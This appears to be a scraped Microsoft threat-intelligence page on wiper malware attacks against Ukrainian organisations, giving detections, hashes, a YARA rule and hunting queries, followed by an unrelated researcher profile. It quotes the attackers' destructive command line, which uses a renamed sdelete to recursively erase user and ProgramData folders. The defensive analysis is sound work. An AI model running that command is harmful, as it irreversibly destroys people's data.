2.  **Microsoft Security Best Practices:** Microsoft customers can follow best practices that provide clear actionable guidance for security related decisions. These are designed to improve your security posture and reduce risk whether your environment is cloud-only, or a hybrid enterprise spanning cloud(s) and on-premises data centers: Microsoft Security Best Practices  
    
3.  **Protect against ransomware and extortion:** Human-operated ransomware attacks can be catastrophic to business operations and are difficult to clean up, requiring complete adversary eviction to protect against future attacks. Follow our ransomware specific technical guidance to help prepare for an attack, limit the scope of damage, and remove additional risks: Human-operated ransomware
    

****Updated malware details and Microsoft security product detections** **Updated malware details and Microsoft security product detections****

For customers utilizing Microsoft security products, we continue to build and release protections for the evolving threats we have identified impacting organizations with ties to Ukraine. As noted in the published analysis above, there are multiple actors using a variety of tools and techniques in this dynamic threat landscape. Some of these threats are assessed to be more closely tied to nation-state interests, while others seem to be more opportunistically attempting to take advantage of events surrounding the conflict. We have observed attacks reusing components of known malware that are frequently covered by existing detections, while others have used customized malware for which Microsoft has built new comprehensive protections.

**Destructive wiper attacks Destructive wiper attacks**

Beginning with WhisperGate, Microsoft continues to observe destructive malware attacks impacting organizations in Ukraine. These attacks are often the final stage to intrusions that, in some cases, may have predated the current military actions in Ukraine. We assess that the intended objective of these attacks is the disruption, degradation, and destruction of targeted resources. The Microsoft Threat Intelligence Center (MSTIC) assesses that organizations within Ukraine continue to be at high-risk for destructive operations for the foreseeable future.

Microsoft Defender Antivirus provides detections for the wiper attacks in build version **1.363.797.0** or newer. Customers utilizing automatic updates do not need to take additional action. Enterprise customers managing updates should select the detection build **1.363.797.0** or newer and deploy it across their environments.

The following is a list of high-level activities and the related malware that Microsoft has identified and is protecting customers against:

**WhisperGate WhisperGate**

Limited-scope destructive malware attack on January 13, 2022 impacting dozens of systems spanning multiple government, non-profit, and information technology organizations, all based in Ukraine. MSTIC tracks the actor responsible for this attack as DEV-0586 and has not linked it to a previously known activity group. We assess that DEV-0586 continues to be active in Ukraine but is also targeting other countries within the region.

**FoxBlade and SonicVote FoxBlade and SonicVote**

Destructive malware attack originally discovered on February 23, 2022 impacting hundreds of systems spanning multiple government, information technology, financial sector, and energy organizations predominately located in or with nexus to Ukraine. MSTIC has attributed events associated with FoxBlade with medium confidence to IRIDIUM (previously tracked as DEV-0665). Microsoft assesses there will be a continued risk for destructive activity from this group, as we have observed follow-on intrusions since February 23 involving these malicious capabilities. Microsoft is tracking the following malware families related to this activity:

*   FoxBlade (aka HermeticWiper / HermeticWizard)
*   SonicVote (aka HermeticRansom)

IRIDIUM has also periodically leveraged a renamed version of the SysInternals utility _sdelete_(renamed by IRIDIUM to _cdel.exe_) to perform targeted secure deletion of areas of the file system using the following command-line pattern:

c:\Windows\System32\cmd.exe /C C:\Windows\cdel.exe -accepteula -r -s -q c:\Users & C:\Windows\cdel.exe -accepteula -r -s -q c:\ProgramData

**Lasainraw (aka IsaacWiper) Lasainraw (aka IsaacWiper)**

Limited destructive malware attack originally identified by ESET on February 25, 2022. Microsoft continues to investigate this incident and has not currently linked it to attributed threat actors.

**DesertBlade DesertBlade**

Limited destructive malware attack in early March 2022 impacting a single Ukrainian entity. Similar to other destructive capabilities, DesertBlade, which is implemented in Golang, was deployed via hijacked Group Policy Objects (GPOs). DesertBlade is responsible for iteratively overwriting and then deleting overwritten files on all accessible drives (sparing the system if it is a domain controller). Due to the nature of the investigation and partnerships involved, Microsoft is currently not able to share samples of DesertBlade. However, we can share the following hashes as examples of the DesertBlade family:

*   a71c8306b6b8a89c18dea3b1490037593737d59b023000f24da94e3275600b59
*   4ca63406ff189301ccbb54daa6e2da4bc5d03ffc1a8a9756717d95d26abc3906

The following Yara rule can be used to detect DesertBlade using these hashes:

rule DesertBlade { meta: author = "Microsoft Threat Intelligence Center (MSTIC)" description = "Detects Golang package, function, and source file names observed in DesertBlade samples" hash = "a71c8306b6b8a89c18dea3b1490037593737d59b023000f24da94e3275600b59" strings: $s1 = "main.wipe\x00\x00" $s2 = "main.getRandomByte\x00\x00" $s3 = "main.drives\x00\x00" $s4 = "main.main.func3\x00\x00" $s5 = "walk.volumeNameLen\x00\x00" $s6 = "windows.GetLogicalDriveStrings\x00\x00" $s7 = "api.ExplicitAccess\x00\x00" $s8 = "go-acl.GrantSid\x00\x00" $s9 = "/src/w/w.go\x00\x00" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 5MB and filesize > 1MB and all of ($s*) }

**FiberLake (aka DoubleZero) FiberLake (aka DoubleZero)**

On March 22, 2022 CERT-UA published details on a .NET capability being used in destructive attacks tracked by Microsoft as FiberLake (aka DoubleZero). Microsoft has observed FiberLake being used in attacks targeting Ukraine broadcast/media organizations. Microsoft is continuing to investigate this incident and has not currently linked it to known threat activity.

**CaddyWiper and AprilAxe (aka ARGUEPATCH) CaddyWiper and AprilAxe (aka ARGUEPATCH)**

CaddyWiper was first discovered by ESET on March 14, 2022 and has been observed by Microsoft impacting a limited number of organizations in targeted attacks. CaddyWiper is a destructive capability that results in file and drive overwriting, rendering compromised systems unbootable. On April 1, 2022, Microsoft identified a new variant that involved a multi-stage loading process.

In this new variant, the threat actor leveraged a backdoored IDA debugger server executable, which Microsoft has named AprilAxe\*.\* AprilAxe is designed to de-obfuscate and load malicious code from disk. In all observed intrusions, the loader is paired with a variant of CaddyWiper. Microsoft has observed multiple impacted organizations across government, natural resources, banking, and energy organizations. ESET published technical details on this new version of CaddyWiper/ARGUEPATCH. In line with ESET, MSTIC also attributes the intrusion activity and capabilities to IRIDIUM.

**Industroyer.B (aka Industroyer2) Industroyer.B (aka Industroyer2)**

On April 8, 2022, Microsoft observed AprilAxe and CaddyWiper being staged to target an energy organization in Ukraine. During this intrusion, the actors also deployed a malicious ICS/SCADA utility named Industroyer 2, which is capable of interacting with industrial control systems. CERT-UA and ESET published additional technical details on this capability. In line with ESET, MSTIC attributes this intrusion activity and capability to IRIDIUM.

Customers are encouraged to turn on cloud-delivered protection and automatic sample submission in Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. As we continue to investigate these attacks and uncover new data, we will add or update protections.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint customers should look for the following family names for activity related to the wiper attacks:

*   WhisperGate
*   FoxBlade
*   Lasainraw
*   SonicVote
*   CaddyWiper
*   AprilAxe
*   FiberLake
*   Industroyer
*   DesertBlade

The observed wiper attacks can be further limited through additional hardening configurations. When enabled, these features bring more resilience to customer defenses in addition to defending against these specific wiper attacks:

*   Tamper protection prevents common techniques observed to disable security protections on endpoints.
*   Controlled folder access allows only trusted apps to access protected folders. It is typically effective at blocking these wiper attacks.

**Unattributed threat activity**

As part of continued efforts by the MSTIC and Microsoft 365 Defender Research teams to identify threat activity and protect organizations, we continue to discover unattributed threat activity. We will continue to analyze activity and build detections for these threats as they are identified.

As with any observed nation-state actor activity, where possible, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with information they need to help guide their investigations. MSTIC is also actively working with members of the global security community and other strategic partners to share information that can help address this evolving threat through multiple channels. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity.

**Common secondary intrusion behaviors**

Many of the observed attacks have made use of known malware and intrusion tactics, techniques, and procedures (TTPs) that are detected by Microsoft Defender for Endpoint using these common alerts:

*   Suspicious remote activity
*   Suspicious access to LSASS service
*   Microsoft Defender Antivirus tampering
*   Suspicious remote activity

Customers who see incidents that tie one or more of these indicators together should prioritize investigation of the affected devices.

**Opportunistic phishing campaigns**

Taking advantage of interest in the geopolitical conflict, attackers have been observed using tailored domains in phishing attacks. Microsoft SmartScreen and the network protection feature in Microsoft Defender for Endpoint provide protections for customers lured to these domains, including, but not limited to, the following:

*   help-for-ukraine\[.\]eu
*   tokenukraine\[.\]com
*   ukrainesolidarity\[.\]org
*   ukraine-solidarity\[.\]com
*   saveukraine\[.\]today
*   supportukraine\[.\]today

**Hunting for related attacks**

Microsoft Sentinel and Microsoft Defender for Endpoint customers can hunt for related activity through the queries below:

**Microsoft Sentinel**

Microsoft Sentinel offers detection and threat hunting analytics for techniques observed in relation to these threats. These analytics can be found in the Microsoft Sentinel portal or via the Microsoft Sentinel GitHub.

Crash dump disabled on host

This query looks for registry keys being set on a host in order to prevent crash dumps being created.

https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/Crashdumpdisabledonhost.yaml

New EXE deployed via Default Domain or Default Domain Controller Policies

This query looks for executables executed on host that appear to have been deployed via the Default Domain Policy or the Default Domain Controller Policy. These policies are not typically used for distributing executables.

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/NewEXEdeployedviaDefaultDomainorDefaultDomainControllerPolicies.yaml

Potential renamed Sdelete usage

This query looks for command line parameters associated with recursive use of Sdelete against the C drive where the originating process isn’t named _sdelete.exe._

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/Potentialre-namedsdeleteusage.yaml

Sdelete deployed via GPO

This query looks for Sdelete being deployed via GPO and run recursively on a host.

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SdeletedeployedviaGPOandrunrecursively.yaml

**Microsoft Defender for Endpoint**

To locate possible exploitation activity, run the following queries:

Surface suspicious MSHTA process execution

Use this query to look for MSHTA launching with command lines referencing DLLs in the AppData\\Roaming path.

    DeviceProcessEvents
    | where FileName =~ "mshta.exe"
    | where ProcessCommandLine has_all (".dll", "Roaming")
    | where ProcessCommandLine contains @"Roaming\j"
    | extend DLLName = extract(@"[jJ][a-z]{1,12}\.dll", 0, ProcessCommandLine)
    

Surface suspicious Scheduled Task activity

Use this query to look for Scheduled Tasks that may relate to actor activity.

    DeviceProcessEvents
    | where ProcessCommandLine has_all ("schtasks.exe", "create", "wscript", "e:vbscript", ".wav")
    

Potential renamed _sdelete_ usage

Use this query to look for command line parameters associated with the use of a renamed Sysinternals sdelete tool to delete multiple files on the C drive as part of destructive attacks on a host.

    DeviceProcessEvents
    | where InitiatingProcessFileName !~ "sdelete.exe"
    and InitiatingProcessCommandLine has_all ("-accepteula", "-r", "-s", "-q", "c:/")
    and InitiatingProcessCommandLine !has ("sdelete")
    

Microsoft continues to investigate these attacks and improve protections as new data is analyzed. In addition, Microsoft Sentinel and Microsoft 365 Defender have a range of existing queries for the detection of common techniques, such as lateral movement and privilege escalation. We recommend customers use these queries to identify common attacker techniques being used in these attacks.

We continue to monitor activity and will update this page with more information as the situation develops.

Cyber threat activity in Ukraine: analysis and resources

“There are few jobs where I can say, I make two billion people more secure on the internet every single day.”
Childhood Look: Goth kid, all in black
Current Look: Cyber Viking
Childhood hobby: Head banging to Metallica, Marilyn Manson, and Guns N’ Roses
Current hobby: n0x08 DJ’s Live events around the world.

_“There are few jobs where I can say, I make two billion people more secure on the internet every single day.”_

**Childhood Look:** Goth kid, all in black

**Current Look:** Cyber Viking

**Childhood hobby:** Head banging to Metallica, Marilyn Manson, and Guns N’ Roses

**Current hobby:** n0x08 DJ’s Live events around the world. Check him out here.

**Most Innocent Hack:** Finding a backdoor admin interface to his public library. He moved his name to the top of the waitlist on books he wanted to read.

**Proudest Achievement** : Starting the CTI League

This month’s researcher spotlight is on Nate Warfield. If you’ve heard his name, it’s probably from one of two ways. Warfield is the Chief Technology Officer of Prevailion, a next-generation cyber intelligence company who protect orgs from cyber threats targeting their networks. Or it’s from when Warfield was a member of the MSRC team where he was one of the (unofficial) voices and faces of MSRC to the security researcher community.

For some of you, Warfield’s back story may seem familiar. He didn’t have a lot of money growing up. His family was poor. Warfield squeezed every minute out of free AOL discs that would arrive in the mail. He stumbled upon internet forums teaching him how to generate fake credit card keys. This allowed him to enjoy his free internet ride a little longer. Moments like this unlocked a curiosity within Warfield. At 12 years old, he understood how software and internet services worked. Once, he discovered the superuser password in a BBS software package to help procure more download time. Warfield loved playing Wolfenstein 3D. He knew if he continued to push the limits, he could get whatever he wanted.

Growing up on the island of Oahu, Warfield stood out. He found solace on his computer. He became the target of bullies, which he had no time for. He retaliated by creating a three-hour pager “bomb” which flooded his targets with pages. Another time it was an email spam campaign aimed at his high school faculty. Eventually, it would all come to an end in the form of expulsion. This was his wakeup call. Warfield felt the pull of computers leading him off the island. His father on the other hand, suggested he get a job at Taco Bell. Warfield declined. Instead, he channeled his father’s strong work ethic. There were limited opportunities for IT on the islands, but it didn’t stop him from finding work. One of his first roles was working phone support for a dialup ISP. He saved his money and landed in Seattle doing tech support for F5 Networks. These jobs would lay his foundation for helping others.

Warfield’s tenure at MSRC was an interesting period; both for him and the cybersecurity industry. He remembers back when the Shadow Brokers leaked Eternal Blue, which led to the WannaCry attack. Warfield was in his office on the Redmond campus when news of the leak broke. He and another co-worker helped sound the alarm. This was a galvanizing moment for the security response team. “Everyone came together immediately; researchers, analysts, coders.” Warfield recalled. Fueled by pizza and caffeine, engineers across the company worked into the evening to confirm the vulnerabilities in the leak were addressed in the latest patches. Warfield’s responsibility was to quickly ascertain the payloads didn’t contain any additional or unknown exploits.

**“It was cool to see a bunch of people across Microsoft immediately come together, focused on the mission, and succeed at the mission at hand, which was figuring out what was in there.”**

Although it was a highly stressful, and challenging period, Warfield was left feeling proud of how the company unified and rallied to address the leak and get guidance out to customers.

The Security Servicing Criteria for Windows is another point of pride for Warfield. The impetus for its creation came in part from community feedback. Researchers needed better guidance to understand which boundaries and features qualified for servicing and bounties. Microsoft’s Matt Miller kicked off the project and helped connect teams from across the company to participate. Warfield then helped author and publish the document that provided transparency with the research community, aligning internal and external people in a way that hadn’t existed until then. The project was a success. Warfield remembers feeling a great sense of accomplishment. The industry responded positively with an acknowledgement of his work and a tip of their hats.

**“It was kind of cool to say, this information didn’t exist 5 years ago. And now it does because I worked with a bunch of people, and we got it out there.”**

Warfield attributes his growth to mentors he’s had along the way. He learned the power of human connection and engaged with the research community to hear the candid feedback about the challenges. He took the onus to streamline the researcher engagement processes. He leaves behind a positive legacy for his desire to serve those in need. This human connection also went further than just emailing or tweeting him. Warfield was intentional about meeting new people in the community at hacker conventions. From chatting over food and drinks, to hallway chats, he made himself available to connect with anyone who came his way.

Helping people is a part of Warfield’s DNA and a driving force behind the work he does today. While he has never officially submitted a bug, Warfield has been instrumental in supporting hundreds of security researchers and their success. During his time in MSRC, he leaned in on his background in network engineering to help secure the Internet in a different way: cloud network security research. Inspired by a 2016 blog on Redis servers, Warfield began working with the Azure team to help identify compromised virtual machines and coordinate notifications to affected customers. Leveraging tools like Shodan and GreyNoise, he began presenting his techniques and lessons learned at hacker conferences to educate people about the risks of common security mistakes. This same skillset prepared him for a challenge no one saw coming; defending the critical infrastructure of healthcare.

Early in the pandemic, hospitals became the target of ransomware attacks. Ohed Zaidenberg, a cyber intelligence researcher reached out to Warfield via Twitter. They formed a coalition called the Cyber Threat Intelligence League (CTI). He put out the call and hundreds of security researchers and practitioners joined the league. Together they were able to accomplish their mission to keep hospitals secure and teach them how to defend themselves from cyber threats. All the researchers are volunteers. Warfield describes the league as something he is most proud of professionally. Check out Wired’s The Cyber-Avengers Protecting Hospitals from Ransomware. The work he and his colleagues are doing, give him hope for a brighter, safer, future for his children and the world at large. His personal joys come from being a father, snowboarding and traveling the globe spending time with his hacker family. Follow Nate on Twitter at @n0x08.

Tag

#backdoor